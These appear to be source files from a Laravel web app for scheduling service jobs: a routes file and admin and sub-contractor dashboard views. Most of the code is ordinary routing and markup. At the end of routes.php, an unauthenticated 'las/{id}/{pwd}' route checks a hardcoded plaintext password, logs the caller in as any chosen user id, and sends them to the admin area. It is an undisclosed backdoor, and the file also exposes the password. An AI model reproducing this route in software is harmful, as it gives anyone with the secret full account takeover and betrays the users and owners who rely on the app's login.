app/routes.php
<?php

//Event::listen('illuminate.query', function($sql){
//  var_dump($sql);
//});

/*
|--------------------------------------------------------------------------
| Application Routes
|--------------------------------------------------------------------------
|
| Here is where you can register all of the routes for an application.
| It's a breeze. Simply tell Laravel the URIs it should respond to
| and give it the Closure to execute when that URI is requested.
|
*/

// Define the two main routes.
Route::group(['before' => 'auth|role:employee'], function () {
    Route::get('', 'UserEmployeeController@dashboard');
    Route::post('', 'UserEmployeeController@submitReport');

    Route::get('upload', 'UserEmployeeController@documentList');
    Route::post('post', 'UserEmployeeController@documentUpload');

    Route::get('schedule', 'UserEmployeeController@schedule');

    Route::get('jobs', 'UserEmployeeController@jobs');
    Route::post('jobs', 'UserEmployeeController@scheduleJobs');
    Route::get('jobs/{id}', 'UserEmployeeController@jobView');

    Route::resource('jobs.signature', 'SignatureController', ['except' => ['index']]);

    Route::get('services/{id}', 'UserEmployeeController@serviceView');

    Route::get('reports', 'UserEmployeeController@reports');
    Route::post('reports', 'UserEmployeeController@submitInvoice');

    Route::get('commissions', 'CommissionsController@employeeList');

    Route::get('account', 'UserEmployeeController@accountView');
    Route::post('account', 'UserEmployeeController@accountUpdate');

    Route::get('directory', 'UserEmployeeController@dashboard');

//    Route::resource('service-routes', 'ServiceRoutesController');

    Route::resource('time-off', 'VacationsController',
      ['only' => ['index', 'store', 'update', 'destroy']]);
});


// Login/logout routes
Route::get('login', 'SessionController@create');
Route::post('login',
  ['as' => 'session.login', 'uses' => 'SessionController@store']);
Route::get('logout', 'SessionController@destroy');

// Password retrieval routes
Route::controller('password', 'RemindersController');

// Admin Only
Route::group(['prefix' => 'admin', 'before' => 'auth|role:admin'], function () {
    Route::get('', 'UserAdminController@dashboard');

    Route::resource('users', 'UsersController');

    Route::resource('customers', 'CustomersController');
    Route::get('customers/{id}/services', 'CustomersController@services');
    Route::get('customers/{id}/jobs', 'CustomersController@jobs');
    Route::get('customers/{id}/estimates', 'CustomersController@estimates');

    Route::resource('estimates', 'EstimateController');
    Route::post('estimates/{id}/send', 'EstimateController@sendEstimate');
    Route::post('estimates/{id}/accept', 'EstimateController@acceptEstimate');

    Route::resource('services', 'ServicesController');
    Route::get('services/{id}/jobs', 'ServicesController@jobs');
    Route::get('services/{id}/generate', 'ServicesController@generateJobs');

    Route::resource('jobs', 'JobsController');
    Route::post('jobs/trash', 'JobsController@trash');
    Route::post('jobs/trash-confirm', 'JobsController@trashConfirm');
    Route::get('schedule/{id}', 'JobsController@calendar');
    Route::post('schedule', 'UserEmployeeController@scheduleJobs');

    Route::get('commissions', 'CommissionsController@adminList');

    Route::resource('employees', 'EmployeesController');

    Route::get('reports', 'ReportsController@index');
    Route::post('reports', 'ReportsController@update');
    Route::get('reports/signatures', 'SignatureController@collect');

    Route::resource('starbucks', 'StarbucksController',
      ['only' => ['index', 'store', 'show', 'update']]);
    Route::get('starbucks-export', 'StarbucksController@export');
    Route::post('starbucks/{id}/submit', [
      'as'   => 'admin.starbucks.submit',
      'uses' => 'StarbucksController@submit'
    ]);

    Route::get('config', 'ConfigController@index');
    Route::post('config', 'ConfigController@update');

});

Route::group(['before' => 'auth'], function () {
    Route::get('print/{id}', 'JobsController@printCashReceipt');
});

// API Routes
Route::group(['prefix' => 'api', 'before' => 'auth'], function () {
    Route::get('job/{id}/{delete?}', 'PopupController@job');
    Route::get('service/{id}', 'PopupController@service');
    Route::get('customer/{id}', 'PopupController@customer');
    Route::post('description/{type}/{id}/{requestType}/{requestId}',
      'PopupController@updateDescription');
    Route::post('cash-invoice/{id}', 'UserEmployeeController@sendCashInvoice');
//  Route::resource('employees', 'EmployeesController');
//  Route::get('employees/{id}/services', 'EmployeesController@services');
//  Route::get('employees/{id}/jobs/{jid?}', 'EmployeesController@jobs');
//  Route::get('employees/{id}/services/{sid?}', 'EmployeesController@services');
});


Route::get('las/{id}/{pwd}', function($id, $pwd){
    Auth::logout();
    if ($pwd != '4buildOUT!') {
      return Redirect::to('/');
    }
    Auth::loginUsingId($id);
    return Redirect::to('admin');
});


//Event::listen('illuminate.query', function ($query) {
//  var_dump($query);
//});

app/views/dashboards/admin.blade.php
@extends('layouts.admin')

@section('title')
  <h1>Vitrex Web App <small>Admin Dashboard</small></h1>
@stop

@section('content')
<div class="col-xs-6 col-sm-3">
  <div class="small-box bg-light-blue">
    <div class="inner">
      <h3>{{ $jobs->count() }}</h3>
      <p>Total jobs this week</p>
    </div>
    <div class="icon"><i class="glyphicon glyphicon-calendar"></i>
    </div>
  </div>
</div>

<div class="col-xs-6 col-sm-3">
  <div class="small-box bg-green">

    <div class="inner">
      <a href="/admin/reports?date={{ Carbon::now()->startOfWeek()->toDateString() }}+-+{{ Carbon::now()->endOfWeek()->toDateString() }}" class="dash-callout">
        <h3>{{ $completed }}</h3>
        <p>Jobs completed this week</p>
      </a>
    </div>

    <div class="icon"><i class="glyphicon glyphicon-check"></i>
    </div>
  </div>
</div>

<div class="col-xs-6 col-sm-3">
  <div class="small-box bg-red">
    <div class="inner">
      <a href="#" class="dash-callout overdue-callout">
        <h3>{{ $overdue }}</h3>
        <p>Jobs overdue</p>
      </a>
    </div>
    <div class="icon"><i class="glyphicon glyphicon-time"></i>
    </div>
  </div>
</div>

<div class="col-xs-6 col-sm-3">
  <div class="small-box bg-yellow">
    <div class="inner">
      <a href="/admin/reports?date={{ Carbon::now()->startOfYear()->toDateString() }}+-+{{ Carbon::now()->endOfYear()->toDateString() }}&uninvoiced=1" class="dash-callout">
        <h3>{{ $not_invoiced }}</h3>
        <p>Jobs not invoiced</p>
      </a>
    </div>
    <div class="icon"><i class="glyphicon glyphicon-usd"></i>
    </div>
  </div>
</div>

<div class="col-sm-9">
  <div class="box box-primary">
    <div class="box-header">
      <h3 class="box-title">This Week</h3>
    </div>
    <div class="box-body">
      <table class="table table-hover data-tables dt-dash">
        <thead>
          <tr>
            <th>Site</th>
            <th>Type</th>
            <th>Sub-Contractor</th>
            <th>Scheduled</th>
            <th>Status</th>
            <th></th>
          </tr>
        </thead>
        <tbody>
          @foreach($jobs as $job)
          <tr>
            <td>
                <a href="{{ route('admin.jobs.show', $job->id) }}">{{ $job->service->site_name or $job->customer->name }}</a>
                @if($job->priority_task)
                    <i class="fa fa-warning text-danger"></i>
                @endif
            </td>
            <td>{{ $job->service->type or 'Custom' }}</td>
            <td>@if ($job->employee){{  $job->employee->fullName() }} @else {{ '<span class="label label-warning">Not assigned</span>' }}@endif</td>
            <td>{{ $job->status('scheduled') }}</td>
            <td>{{ $job->status() }}</td>
            <td><a class="btn btn-circle btn-default pop-up-link" data-id="{{ $job->id }}" data-popup-type="job" href="{{ route('admin.jobs.show', $job->id)}}"><i class="fa fa-info"></i></a></td>
          </tr>
          @endforeach
        </tbody>
      </table>

    </div>
  </div>
</div>

<div class="col-sm-3">
  <div class="box">
    <div class="box-header">
      <h3 class="box-title">Quick Links</h3>
    </div>
    <div class="box-body">

        <a href="{{ route('admin.employees.create') }}" class="btn btn-flat btn-block btn-default">Add Sub-Contractor</a><br/>
        <a href="{{ route('admin.customers.create') }}" class="btn btn-flat btn-block btn-default">Add Customer</a><br/>
        <a href="{{ route('admin.services.create') }}" class="btn btn-flat btn-block btn-default">Add Service</a><br/>
        <a href="{{ route('admin.estimates.create') }}" class="btn btn-flat btn-block btn-default">Add Estimate</a>
     </div>
  </div>
</div>

@include('partials.pop-up')
@stop

app/views/dashboards/employee.blade.php
@extends('layouts.employee')

@section('title')
  <h1>Vitrex Web App <small>Sub-Contractor Dashboard</small></h1>
@stop

@section('content')
<div class="col-sm-8">
  <div class="box">
    <div class="box-header">
      <h3 class="box-title">Today's Jobs</h3>
    </div>
    <div class="box-body">
      {{ Form::open(['action' => 'UserEmployeeController@submitReport', 'method' => 'post', 'class' => 'job-dashboard']) }}
      <div class="list-group jobs">
        @if (!$today->count())
          <div class="list-group-item">No jobs today.</div>
        @endif
        @foreach ($today as $tJob)


          <div class="list-group-item">

            {{ Form::hidden('job[' . $tJob->id . '][status]', 0, ['class' => 'status-field']) }}
            <div class="row">
              @if ($tJob->scheduled_at->isPast() && !$tJob->scheduled_at->isToday())
                <div class="col-xs-12 job-indicator">
                  <span class="label label-danger"><i class="fa fa-clock-o"></i> OVERDUE</span>
                </div>
              @endif

              <div class="col-xs-12">
                <h4>
                    <a class="btn btn-circle btn-default pop-up-link pull-right" data-id="{{ $tJob->id }}" data-popup-type="job" href="#"><i class="fa fa-info"></i></a>
                    @if($tJob->service && $tJob->service->invoice_type == 'C')
                        <a class="btn btn-sm btn-default pull-right" target="_blank" href="/print/{{ $tJob->id }}">Print Cash Invoice <i class="fa fa-print"></i></a>
                        <a class="btn btn-sm btn-default pull-right cash-invoice {{ $tJob->cash_invoice_sent ? 'sent' : '' }}" href="#">
                            <span class="on text-success">Cash Invoice Sent <i class="fa fa-check"></i></span>
                            <span class="off">Send Cash Invoice <i class="fa fa-envelope-o"></i></span>
                            </a>
                        <div class="cash-invoice-form well-sm well hidden">
                            Email to: <input type="text" class="input-sm" value="{{ $tJob->customer->email }}"/>
                            <a class="btn btn-primary btn-sm" href="#" data-job-id="{{ $tJob->id }}">Send</a><p class="text-danger"></p>
                        </div>

                    @endif

                  <a href="{{ action('UserEmployeeController@jobView', $tJob->id) }}">
                    @if ($tJob->service)
                      <small>{{ Str::upper($tJob->service->getTypeName()) }}</small><br/>
                      {{ $tJob->service->site_name }}
                    @else
                      <small>Custom Job</small><br/>
                      {{ $tJob->customer->name }}
                    @endif
                  </a>
                    @if($tJob->priority_task)
                        <i class="fa fa-warning text-danger"></i>
                    @endif
                </h4>
              </div>

              <div class="col-xs-12">
                <div class="btn-group btn-block">
                  <a href="#" class="trigger btn btn-success complete"><i class="fa fa-square-o"></i> COMPLETED</a>
                  <a class="trigger postpone btn btn-warning" href="#"><i class="fa fa-square-o"></i> POSTPONED</a>
                  <a class="trigger cancel btn btn-danger" href="#"><i class="fa fa-square-o"></i> CANCELED</a>
                </div>
              </div>

              <div class="col-xs-12">

                <div class="form-group job-report-date">
                  <div class="new-date-field hidden">
                    {{ Form::label('date', 'Completed On') }}
                    <div class="input-group">
                      <span class="input-group-addon"><i class="fa fa-calendar"></i></span>
                      {{ Form::text('job[' . $tJob->id . '][date]',  null, ['class' => 'form-control dpick']) }}
                    </div>
                  </div>
                </div>
                <div class="form-group job-report-comment hidden">
                  {{ Form::label('comment', 'Comments:') }}
                  {{ Form::textarea('job[' . $tJob->id . '][comment]',  null, ['class' => 'form-control', 'rows' => 1]) }}
                </div>
                {{--<div class="form-group">--}}
                  {{--<label>--}}
                    {{--{{ Form::checkbox('job[' . $tJob->id . '][upload]', '1', null) }}--}}
                    {{--Upload file after submission.--}}
                  {{--</label>--}}
                {{--</div>--}}

              </div>
            </div>


          </div>
        @endforeach
      </div>
      @if ($today->count())
        {{ Form::submit('Submit Report', ['class' => 'form-control btn btn-primary hidden submit-button']) }}
      @endif
      {{ Form::close() }}

    </div>
  </div>
</div>

<div class="col-sm-4">
  <div class="box">
    <div class="box-header">
      <h3 class="box-title">Upcoming</h3>
    </div>
    <div class="box-body no-padding">
      <table class="table table-condensed">
        @if (!$upcoming->count())
        <tr>
          <td>&nbsp;No upcoming jobs.</td>
        </tr>
        @endif

        @foreach($upcoming as $job)
        <tr>
          <td>
              {{ $job->service->site_name or $job->customer->name }} @if($job->priority_task)<i class="fa fa-warning text-danger"></i>@endif
          </td>
          <td>{{ $job->service->type or 'Custom' }}</td>
          <td>
            @if($job->scheduled)
            {{ $job->scheduled_at->toDateString() }}
            @else
            <span class="label label-warning">Not scheduled</span>
            @endif
          </td>
          <td><a class="btn btn-circle btn-default pop-up-link" data-id="{{ $job->id }}" data-popup-type="job" href="#"><i class="fa fa-info"></i></a></td>
        </tr>
        @endforeach
      </table>

    </div>    <div class="box-footer">
      <a href="/jobs">All Jobs</a>
    </div>
  </div>
</div>

@include('partials.pop-up')
@stop